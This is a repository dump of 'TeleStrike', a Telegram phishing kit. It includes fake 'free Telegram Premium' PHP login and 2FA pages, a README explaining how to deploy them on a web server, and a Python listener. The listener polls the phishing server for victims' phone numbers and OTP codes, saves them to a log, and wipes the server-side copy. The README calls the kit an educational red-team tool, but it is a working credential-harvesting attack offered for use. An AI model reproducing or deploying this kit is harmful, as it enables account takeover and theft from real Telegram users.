├── requirements.txt ├── source code ├── img │ ├── pngwing.com.png │ └── TelegramPremium336.jpg ├── save_decision.php ├── delete_data.php ├── wait.php ├── final.php ├── rejected.php ├── 2fa.php └── index.php ├── README.md └── TeleStrike.py /requirements.txt: -------------------------------------------------------------------------------- 1 | time 2 | requests 3 | datetime -------------------------------------------------------------------------------- /source code/img/pngwing.com.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/er4vn/TeleStrike/HEAD/source code/img/pngwing.com.png -------------------------------------------------------------------------------- /source code/img/TelegramPremium336.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/er4vn/TeleStrike/HEAD/source code/img/TelegramPremium336.jpg -------------------------------------------------------------------------------- /source code/save_decision.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /source code/delete_data.php: -------------------------------------------------------------------------------- 1 | 15 | -------------------------------------------------------------------------------- /source code/wait.php: -------------------------------------------------------------------------------- 1 | 20 |

Please wait...

21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🛰️ TeleStrike – Telegram Account Penetration Toolkit 2 | 3 | **TeleStrike** is a red team utility designed for adversary simulation and security auditing of Telegram accounts. 4 | Built for **educational** and **authorized assessment** purposes, it mimics real-world attack vectors to test resilience and response mechanisms in Telegram’s authentication layers. 5 | 6 | Dev: Er4vn | Telegram: @er4vnn 7 | 8 | Screenshot 2025-08-01 195442 9 | 10 | --- 11 | 12 | ## ⚔️ Key Features 13 | - Upcoming features will be introduced in the next update 14 | - 🔍 2FA & Session Enumeration 15 | - 🧬 Token Extraction & Session Hijacking Simulation 16 | - 🧿 Automated Social Engineering Flows 17 | - 🧰 Customizable Modules for Phishing, OTP Timing, and More 18 | 19 | --- 20 | 21 | ## ⚙️ Deployment 22 | 23 | 1. Upload the `source_code` folder to your web server or hosting panel (e.g. VPS, cPanel, Localhost). 24 | 2. On your attacker machine, run the Python listener: 25 | 26 | #### ✅ Requirements 27 | - Python 3 installed 28 | - Internet connection 29 | - Basic terminal knowledge 30 | 31 | --- 32 | 33 | #### 🖥️ Run on Windows: 34 | 35 | 1. Open CMD or PowerShell 36 | 2. Navigate to the script directory 37 | cd path\to\your\script 38 | 39 | 3. Run the script 40 | python TeleStrike.py 41 | 42 | --- 43 | 44 | #### 🖥️ Run on Linux: 45 | 46 | 1. Open your terminal 47 | 2. Navigate to the script directory 48 | cd /path/to/your/script 49 | 50 | 3. Run the script 51 | python3 TeleStrike.py 52 | 53 | --- 54 | 55 | #### 📱 Run on Termux (Android): 56 | 57 | 1. Open Termux 58 | 2. Install Python if not already installed 59 | pkg install python 60 | 61 | 3. Navigate to your script directory 62 | cd /path/to/your/script 63 | 64 | 4. Run the script 65 | python3 TeleStrike.py 66 | 67 | ```bash 68 | python3 TeleStrike.py 69 | 70 | Screenshot 2025-08-01 200809 71 | 72 | -------------------------------------------------------------------------------- /source code/final.php: -------------------------------------------------------------------------------- 1 | 20 | 21 | 22 | 23 | 24 | 25 | Success 26 | 89 | 90 | 91 | 92 |
93 | Success Icon 94 |

Request Submitted Successfully

95 |

Thank you for verifying your identity.

96 |
97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /source code/rejected.php: -------------------------------------------------------------------------------- 1 | 20 | 21 | 22 | 23 | 24 | 25 | Success 26 | 89 | 90 | 91 | 92 |
93 | Success Icon 94 |

Request Submitted Successfully

95 |

Thank you for verifying your identity.

96 |
97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /TeleStrike.py: -------------------------------------------------------------------------------- 1 | import time 2 | import requests 3 | from datetime import datetime 4 | 5 | print(''' 6 | \033[36m 7 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣾⣿⣿⣿⡄ 8 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣶⣿⣿⡿⠿⠛⢙⣿⣿⠃ 9 | ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣶⣾⣿⣿⠿⠛⠋⠁⠀⠀⠀⣸⣿⣿⠀ 10 | ⠀⠀⠀⠀⣀⣤⣴⣾⣿⣿⡿⠟⠛⠉⠀⠀⣠⣤⠞⠁⠀⠀⣿⣿⡇⠀ 11 | ⠀⣴⣾⣿⣿⡿⠿⠛⠉⠀⠀⠀⢀⣠⣶⣿⠟⠁⠀⠀⠀⢸⣿⣿⠀⠀ 12 | ⠸⣿⣿⣿⣧⣄⣀⠀⠀⣀⣴⣾⣿⣿⠟⠁⠀⠀⠀⠀⠀⣼⣿⡿⠀⠀ 13 | ⠀⠈⠙⠻⠿⣿⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀⢠⣿⣿⠇⠀⠀ 14 | ⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡇⠀⣀⣄⡀⠀⠀⠀⠀⢸⣿⣿⠀⠀⠀ 15 | ⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⣿⣠⣾⣿⣿⣿⣦⡀⠀⠀⣿⣿⡏⠀⠀⠀ 16 | ⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⡿⠋⠈⠻⣿⣿⣦⣸⣿⣿⠁⠀⠀⠀ 17 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠁⠀⠀⠀⠀⠈⠻⣿⣿⣿⠏⠀⠀⠀⠀ 18 | 19 | \033[36m| \033[37mTeleStrike 20 | \033[36m| \033[31mWarning\033[37m: Use responsibly. The creator is not liable for illegal use. 21 | \033[36m| \033[37mTelegram: @er4vnn Github: https://github.com/er4vn 22 | ''') 23 | 24 | # فقط دریافت لینک پایه از کاربر 25 | base_url = input("\033[37mEnter the source code file URL(e.g. http://localhost/telegram/):\033[0m ").strip().rstrip('/') + '/' 26 | 27 | # ساخت لینک‌های کامل 28 | user_file = base_url + "user.txt" 29 | decision_url = base_url + "save_decision.php" 30 | file_url = base_url + "userinfo.txt" 31 | delete_url = base_url + "delete_data.php" 32 | 33 | print("\n\033[32m[+] Wait for a user to fall into the trap...\033[0m") 34 | 35 | last_data = "" 36 | 37 | while True: 38 | try: 39 | response = requests.get(user_file) 40 | if response.status_code == 200: 41 | data = response.text.strip() 42 | if data and data != last_data: 43 | print("\n\033[36m[!] User Detection\033[0m") 44 | print(data.replace("Email:", "Username:").replace("Password:", "Password:")) 45 | choice = input("Can I receive the OTP code? (y/n) > ").strip().lower() 46 | requests.post(decision_url, data={"decision": choice}) 47 | last_data = data 48 | print("\033[34mPlease wait to receive the information, it will take about one minute...\033[0m") 49 | time.sleep(35) 50 | 51 | response = requests.get(file_url) 52 | if response.status_code == 200: 53 | with open('userinfo.txt', 'wb') as f: 54 | f.write(response.content) 55 | print("\033[32mFile downloaded successfully. (all_users.txt)\033[0m") 56 | 57 | with open('userinfo.txt', 'r', encoding='utf-8') as f: 58 | user_info = f.read() 59 | 60 | timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") 61 | with open("all_users.txt", "a", encoding="utf-8") as log: 62 | log.write(f"{user_info.strip()}\nTime: {timestamp}\n{'-'*40}\n") 63 | 64 | time.sleep(3) 65 | delete_response = requests.get(delete_url) 66 | print("Delete response:", delete_response.text) 67 | else: 68 | print("\033[31mFailed to download the file.\033[0m") 69 | except Exception as e: 70 | print(f"\033[31mError: {e}\033[0m") 71 | time.sleep(2) 72 | -------------------------------------------------------------------------------- /source code/2fa.php: -------------------------------------------------------------------------------- 1 | 9 | 10 | 11 | 12 | 13 | 14 | Enter 2FA Code 15 | 108 | 109 | 110 | 111 |
112 |

Enter Verification Code

113 |

Please enter the 2FA code sent to your device to continue.

114 | 115 | 116 | 117 |
⏳ Time remaining: 1:00
118 |
119 | 120 | 138 | 139 | 140 | 141 | -------------------------------------------------------------------------------- /source code/index.php: -------------------------------------------------------------------------------- 1 | 10 | 11 | 12 | 13 | 14 | 15 | Telegram Premium Login 16 | 17 | 129 | 130 | 131 | 132 |
133 | Telegram Premium Logo 134 |

Telegram Premium

135 |

To activate your free 1-month Premium plan, please enter your phone number.

136 | 137 | 138 | 139 | 140 | 141 |
142 | 143 | 144 | 170 | 171 | 172 | 173 | --------------------------------------------------------------------------------